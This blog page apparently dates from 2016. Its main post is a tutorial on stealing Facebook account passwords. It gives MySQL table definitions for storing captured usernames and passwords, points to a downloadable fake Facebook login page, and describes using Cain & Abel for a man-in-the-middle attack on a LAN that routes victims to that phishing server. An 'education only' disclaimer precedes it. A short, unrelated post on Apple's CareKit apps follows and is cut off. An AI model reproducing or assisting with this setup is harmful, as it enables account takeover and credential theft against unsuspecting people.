Tuesday, May 24, 2016

5 Steps How to Hack Facebook Account Password

5 Steps How to Hack Facebook Account Password is the tutorial I made to continue the other how to hack a Facebook account tutorial from Hackweiser.


We also want to remind you again that this tutorial How to Hack Facebook Account and the downloadable file is free to use and the purpose is for education. we're not responsible for any misuse of this file.

Requirement:

1. Facebook offline page (download)

2. MySQL Table Query (the MySQL table for this tutorial)


--
-- Table structure for table `fb_fail`
--

CREATE TABLE IF NOT EXISTS `fb_fail` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(255) NOT NULL,
  `pwd` varchar(255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `fb_login`
--

CREATE TABLE IF NOT EXISTS `fb_login` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(255) NOT NULL,
  `pwd` varchar(255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;

--
-- Dumping data for table `fb_login`
--



Hacking Facebook Using Man in the Middle Attack



Level : Medium, Advanced


                       In this tutorial Hacking Facebook Using Man in the Middle Attack I will demonstrate how to hacking Facebook using MITM(Man in the Middle). This attack usually happen inside a Local Area Network(LAN) in office, internet cafe, apartment, etc.

Below is the topology or infrastructure how MITM work, and how it can be happen to do hacking a Facebook account.


In the picture above, the attacker act as the third person attacker will manipulate the switch routing table so the victim will think that attacker is a Web server and vice versa, because the attacker has changed the routing table.

For this tutorial we need to prepare the tools to do Proof of Concept about this tutorial. Below you can download it.

1.  XAMPP – APACHE+PHP+MySQL(We use XAMPP for our fake facebook web server)

2. Cain & Abel (We use it for Man in the Middle Attack)

3. Facebook Offline Page (I have nulled the code, so this script will not contacting Facebook when victim accessed fake Facebook page — only use this for learning)

Download Facebook Offline Page (mediafire.com):


Friday, May 6, 2016

APPLE ANNOUNCES RELEASE OF FIRST CAREKIT APPS FOR iPHONE



Apple today announced the release of the first iPhone apps that take advantage of its open-source CareKit platform. There are four titles available right now, all of which allow patients to share their data with healthcare professionals.

Announced during the iPhone SE event last month, CareKit signals Apple’s first real step into healthcare. By connecting iPhone users with doctors, nurses, and other professionals, it’s more than just a useful platform for health and fitness tracking.